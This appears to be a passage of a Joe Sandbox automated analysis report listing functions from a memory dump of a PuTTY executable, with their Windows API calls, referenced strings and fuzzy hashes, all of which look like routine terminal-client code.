Instruction ID: 90a151fd9d320cc1401eb5a0430c08af41ddd290b5ecc521267385d9e57f881f
Opcode Fuzzy Hash: 07b2e637a231ce6fe829028095a14c8fec710d10f8b86921e05ae9d257ab1a38
Instruction Fuzzy Hash: F541B521A1874241EA209B2AE9503BA7751FB9DBD0F548735DF5D87BF2EE3CE1418300

Function 00007FF6BB32B700 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32 ref: 00007FF6BB32B7A0
ConnectNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000050,00000000,00007FF6BB32B6A3), ref: 00007FF6BB32B7BA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000050,00000000,00007FF6BB32B6A3), ref: 00007FF6BB32B7C4
CloseHandle.KERNEL32 ref: 00007FF6BB32B801

Strings

Error while listening to named pipe: %s, xrefs: 00007FF6BB32B818

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: NamedPipe$CloseConnectCreateErrorHandleLast
String ID: Error while listening to named pipe: %s
API String ID: 3669627233-1472817922
Opcode ID: ad880a6f1a97764aa51432b3948371af73697760d78804cbdcebd6819b4a8865
Instruction ID: 838e91d5820657d6b582393ace46e873088552cb92572f28e8601de4ef1c19df
Opcode Fuzzy Hash: ad880a6f1a97764aa51432b3948371af73697760d78804cbdcebd6819b4a8865
Instruction Fuzzy Hash: B1418326A08A4586E6209B1EE44437E7760FF9CBA4F140239DF9D877B1EF3DE4458740

Function 00007FF6BB2A4AB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

ReleaseCapture.USER32(?,?,?,?,?,?,?,?,?,?,?,00007FF6BB2A32AF), ref: 00007FF6BB2A4B1A
GetWindowPlacement.USER32 ref: 00007FF6BB2A4B69
SetWindowPlacement.USER32 ref: 00007FF6BB2A4B8A
GetCapture.USER32 ref: 00007FF6BB2A4BF0
MessageBeep.USER32(?,?,?,?,?,?,?,?,?,?,?,00007FF6BB2A32AF), ref: 00007FF6BB2A4C18

Part of subcall function 00007FF6BB2D4E00: GetWindowLongPtrA.USER32 ref: 00007FF6BB2D4E2B

Strings

,, xrefs: 00007FF6BB2A4B59

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Window$CapturePlacement$BeepLongMessageRelease
String ID: ,
API String ID: 3018360031-3772416878
Opcode ID: 4c4ee8d28cffcb1e16955972c646d3b16fbee9cf70c6a5ceee3a983bde335b4f
Instruction ID: 8ce08796ab0f3039e5dd497a93e7c6f1d43d039ef4dc58f2a86cba4a451d0642
Opcode Fuzzy Hash: 4c4ee8d28cffcb1e16955972c646d3b16fbee9cf70c6a5ceee3a983bde335b4f
Instruction Fuzzy Hash: C241BF21E0C19246FF68972EA6153BD6691FF8DB80F144531DB2D826F9CFBCE1868E01

Function 00007FF6BB2C7500 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2C7350: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000008,?,00007FF6BB2C7538), ref: 00007FF6BB2C740D
Part of subcall function 00007FF6BB2C7350: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000008,?,00007FF6BB2C7538), ref: 00007FF6BB2C747B
Part of subcall function 00007FF6BB2C7350: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,-00000008,?,00007FF6BB2C7538), ref: 00007FF6BB2C7485

GetCurrentProcess.KERNEL32 ref: 00007FF6BB2C75F8
GetLastError.KERNEL32 ref: 00007FF6BB2C765D
LocalFree.KERNEL32 ref: 00007FF6BB2C7687

Strings

unable to construct ACL: %s, xrefs: 00007FF6BB2C75D1
Unable to set process ACL: %s, xrefs: 00007FF6BB2C7656
Could not restrict process ACL: %s, xrefs: 00007FF6BB2C768D

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AllocateErrorInitializeLast$CurrentFreeLocalProcess
String ID: Could not restrict process ACL: %s$Unable to set process ACL: %s$unable to construct ACL: %s
API String ID: 4156538165-2118130043
Opcode ID: e1a54b302a2c5e5e670e0385cadccdff92b9aab0de00c1f57df9910916773e74
Instruction ID: 9cc9116fcb2e7c2b64c61e6b39f248b3ce4e6a682ab0bfb9ed8d69056dc69366
Opcode Fuzzy Hash: e1a54b302a2c5e5e670e0385cadccdff92b9aab0de00c1f57df9910916773e74
Instruction Fuzzy Hash: BF415F21A0CA9281FA618B1DF8557AA73A5FF88794F200131DB8D87B74EF7DD585CB40

Function 00007FF6BB287850 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68windowCOMMON

Download Yara Rule

APIs

DeleteMenu.USER32 ref: 00007FF6BB28791A
InsertMenuA.USER32 ref: 00007FF6BB287944
DeleteMenu.USER32 ref: 00007FF6BB287955
InsertMenuA.USER32 ref: 00007FF6BB287971

Strings

%s (inactive), xrefs: 00007FF6BB287865
&Restart Session, xrefs: 00007FF6BB287923

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Menu$DeleteInsert
String ID: %s (inactive)$&Restart Session
API String ID: 985044671-219138112
Opcode ID: 97957ebb124bc9ad9d9b64ef8ba3240ded224f421e1759abca994b5577514e67
Instruction ID: 1a559a56976b9553762a8705ac4d551584da4f8ded0b81a359d06de7c3095745
Opcode Fuzzy Hash: 97957ebb124bc9ad9d9b64ef8ba3240ded224f421e1759abca994b5577514e67
Instruction Fuzzy Hash: 9131F825B1861681FA10DB2DED647792360FF8DB90F584032CE4E97BB1DE7DE4468B40

Function 00007FF6BB32B120 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00007FF6BB32B1A3
WaitForSingleObject.KERNEL32 ref: 00007FF6BB32B1B9
GetLastError.KERNEL32 ref: 00007FF6BB32B1C1

Part of subcall function 00007FF6BB2C7AD0: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF6BB2BDCDB), ref: 00007FF6BB2C7B7B

LocalFree.KERNEL32 ref: 00007FF6BB32B1EF
LocalFree.KERNEL32 ref: 00007FF6BB32B1FF

Part of subcall function 00007FF6BB2C7130: LocalAlloc.KERNEL32 ref: 00007FF6BB2C725D
Part of subcall function 00007FF6BB2C7130: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF6BB2C7273
Part of subcall function 00007FF6BB2C7130: SetSecurityDescriptorOwner.ADVAPI32 ref: 00007FF6BB2C728A
Part of subcall function 00007FF6BB2C7130: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF6BB2C72A2

Strings

CreateMutex("%s") failed: %s, xrefs: 00007FF6BB32B1CE

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: DescriptorLocalSecurity$Free$AllocCreateDaclErrorFormatInitializeLastMessageMutexObjectOwnerSingleWait
String ID: CreateMutex("%s") failed: %s
API String ID: 1132015839-2623464464
Opcode ID: bbeb3b4ab6db268fd85c93e9a9ab5333092b447f88002d561e7431a4a6f20bc1
Instruction ID: 8ab6f06a31f7e8b1ed0e45148375a97c1111a80e5d2c24a3366771887256addb
Opcode Fuzzy Hash: bbeb3b4ab6db268fd85c93e9a9ab5333092b447f88002d561e7431a4a6f20bc1
Instruction Fuzzy Hash: 88218221A09A4181EE509B19A4443BE73A1FF8DB94F140238EB8D877B5EF3CE5858B40

Function 00007FF6BB353098 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB3530A7
FlsGetValue.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB3530BC
FlsSetValue.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB3530DD
FlsSetValue.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB35310A
FlsSetValue.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB35311B
FlsSetValue.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB35312C
SetLastError.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB353147

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: be20319644ee280c18fa1c14b1b7ef3fa13c16217240b713059bc59993cee69d
Instruction ID: c3a219f634a60dfac5341ddaa421501f2ef801df393392a097b091e24b9c8988
Opcode Fuzzy Hash: be20319644ee280c18fa1c14b1b7ef3fa13c16217240b713059bc59993cee69d
Instruction Fuzzy Hash: 8E213A24B0C64642FA9867399A9117D62927F4C7A0F144735DB3F87AE6EE2CE5024709

Function 00007FF6BB2876A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

LoadCursorA.USER32 ref: 00007FF6BB2879C0
SetClassLongPtrA.USER32 ref: 00007FF6BB2879D8
SetCursor.USER32 ref: 00007FF6BB2879E1
ShowCursor.USER32 ref: 00007FF6BB2879F4

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00007FF6BB287A0F
false && "Bad busy_status", xrefs: 00007FF6BB287A08

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Cursor$ClassLoadLongShow
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$false && "Bad busy_status"
API String ID: 1160125251-1066913011
Opcode ID: fd2443f98cfae1fcc3893be9996831f099ac4e01e4d46c8cd51c1ce5aba2c915
Instruction ID: 6ec98068d3901ce772788b87aede2e549d2adfb0ecce803ffdd63bb56cebd83c
Opcode Fuzzy Hash: fd2443f98cfae1fcc3893be9996831f099ac4e01e4d46c8cd51c1ce5aba2c915
Instruction Fuzzy Hash: 0F113964E0C19386FB65972DEE442BD2691BF9D780FA94034CA4EC27F1DE7DB9858B00

Function 00007FF6BB2AB6B2 Relevance: 10.6, APIs: 7, Instructions: 52COMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32 ref: 00007FF6BB2AB6B4
SelectObject.GDI32 ref: 00007FF6BB2AB6C7
GetTextExtentPoint32A.GDI32 ref: 00007FF6BB2AB6E3
SetWindowPos.USER32 ref: 00007FF6BB2AB712
InvalidateRect.USER32 ref: 00007FF6BB2AB720
DeleteDC.GDI32 ref: 00007FF6BB2AB729
DefWindowProcA.USER32 ref: 00007FF6BB2AB73A

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Window$CompatibleCreateDeleteExtentInvalidateObjectPoint32ProcRectSelectText
String ID:
API String ID: 2525508449-0
Opcode ID: d889eb4af9c9544aa23dc53e09c92ec3390d6563bbb33ea35df6fc9268c5c0e2
Instruction ID: 7588879a1ecdacd9314b4ab6d051338412ee64b3522c3fe18eeb3feb9e8ac8d2
Opcode Fuzzy Hash: d889eb4af9c9544aa23dc53e09c92ec3390d6563bbb33ea35df6fc9268c5c0e2
Instruction Fuzzy Hash: 89118826B0860186EB18DB2EF82573E6661FB8EB95F550035DF0E83B60DE3CD0468F00

Function 00007FF6BB367B5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6BB367B8D
GetLastError.KERNEL32 ref: 00007FF6BB367B99
CloseHandle.KERNEL32 ref: 00007FF6BB367BB1
CreateFileW.KERNEL32 ref: 00007FF6BB367BDC
WriteConsoleW.KERNEL32 ref: 00007FF6BB367BFB

Strings

CONOUT$, xrefs: 00007FF6BB367BBD

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: dbc9a16b5eeee48a6ee48bd4ee0368ae37068463da30654803f503f6f6d7a1e9
Instruction ID: 0db0a45e232af3273d64bb732d1843bc8eb8ecf6fb6efbf961ce87bdc5110a37
Opcode Fuzzy Hash: dbc9a16b5eeee48a6ee48bd4ee0368ae37068463da30654803f503f6f6d7a1e9
Instruction Fuzzy Hash: 46117C21A18A4186EB508B1AE84472DB2A1FB8CBE4F614234EB1DC77A4DF7CD4448B40

Function 00007FF6BB288260 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32windowCOMMON

Download Yara Rule

APIs

GetStockObject.GDI32 ref: 00007FF6BB288280
SelectPalette.GDI32 ref: 00007FF6BB28828F
ReleaseDC.USER32 ref: 00007FF6BB28829F

Strings

wgs.term_hwnd, xrefs: 00007FF6BB2882E0
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00007FF6BB2882BD, 00007FF6BB2882E7
wintw_hdc, xrefs: 00007FF6BB2882B6

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ObjectPaletteReleaseSelectStock
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$wgs.term_hwnd$wintw_hdc
API String ID: 3714893027-3486798234
Opcode ID: 9bb73d81192733acc6fea9fdd995e3dbd9e5e04040e086bf5101fc3356dcf9c0
Instruction ID: a09fedfee0b1243821ebd6e239957731614fec9fb954c3f7341c9d3ce8d17584
Opcode Fuzzy Hash: 9bb73d81192733acc6fea9fdd995e3dbd9e5e04040e086bf5101fc3356dcf9c0
Instruction Fuzzy Hash: 71010C10E1C95281FA10A75DE8543792360BF5CB84F554035CA1DDAAB59E7DB585CB00

Function 00007FF6BB34C218 Relevance: 9.4, APIs: 6, Instructions: 415COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34C247
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34C31D

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: bd737a2eeb7fa6a4c21db5890d005f92dde7c3970c0139e1f6a19456b06c67e1
Instruction ID: 04701fecd6fa06834819ff37b18f45e06a73409be2f5e4a2280b08bef2d36989
Opcode Fuzzy Hash: bd737a2eeb7fa6a4c21db5890d005f92dde7c3970c0139e1f6a19456b06c67e1
Instruction Fuzzy Hash: 59F1C332A0E69689F7518A2D85503BD3B95BF19B80FDC9032C78CC73A6DE6EE4558700

Function 00007FF6BB29DDC0 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 474timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB34B8AC: _set_error_mode.LIBCMT ref: 00007FF6BB34B8D3

GetCaretBlinkTime.USER32 ref: 00007FF6BB29E535

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/terminal/terminal.c, xrefs: 00007FF6BB29E078, 00007FF6BB29E149, 00007FF6BB29E1F3, 00007FF6BB29E2EF, 00007FF6BB29E3BB
col >= 0 && col < line->cols, xrefs: 00007FF6BB29E1EC, 00007FF6BB29E2E8, 00007FF6BB29E3B4
term->wrap, xrefs: 00007FF6BB29E142
x > 0, xrefs: 00007FF6BB29E071

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: BlinkCaretTime_set_error_mode
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/terminal/terminal.c$col >= 0 && col < line->cols$term->wrap$x > 0
API String ID: 194089122-3097067695
Opcode ID: 35dd72f10746de7798588f7908d4c8cb98d09942c4acdf97e757d8d036e6503f
Instruction ID: 49aba5ae2fbd83558a794225fc49f7db75d52c7636319bd929f11d0f6b808be5
Opcode Fuzzy Hash: 35dd72f10746de7798588f7908d4c8cb98d09942c4acdf97e757d8d036e6503f
Instruction Fuzzy Hash: 09227272A086868BFB289B29D550BBA7760FB59784F044135CB9E837A2DF7CF585C700

Function 00007FF6BB288090 Relevance: 9.1, APIs: 6, Instructions: 116COMMON

Download Yara Rule

APIs

SelectObject.GDI32 ref: 00007FF6BB28818C
GetCharWidth32W.GDI32 ref: 00007FF6BB2881A3
GetCharWidthW.GDI32 ref: 00007FF6BB2881BF
SelectObject.GDI32 ref: 00007FF6BB2881EB
GetCharWidth32A.GDI32 ref: 00007FF6BB288202
GetCharWidthA.GDI32 ref: 00007FF6BB28821E

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Char$ObjectSelectWidthWidth32
String ID:
API String ID: 4136774150-0
Opcode ID: c725a2898587075f43e1dc2d463796dcb35102116dd02835240eaa5493979230
Instruction ID: 610022adc10b9f35e8fcf22cb2861e93424138f1566ca657f0f2384757e098b5
Opcode Fuzzy Hash: c725a2898587075f43e1dc2d463796dcb35102116dd02835240eaa5493979230
Instruction Fuzzy Hash: 78416F21E2891681FE208B1DEE8427D63A1BF9C754FA54232DA1DCB3F4DE3DE8458B10

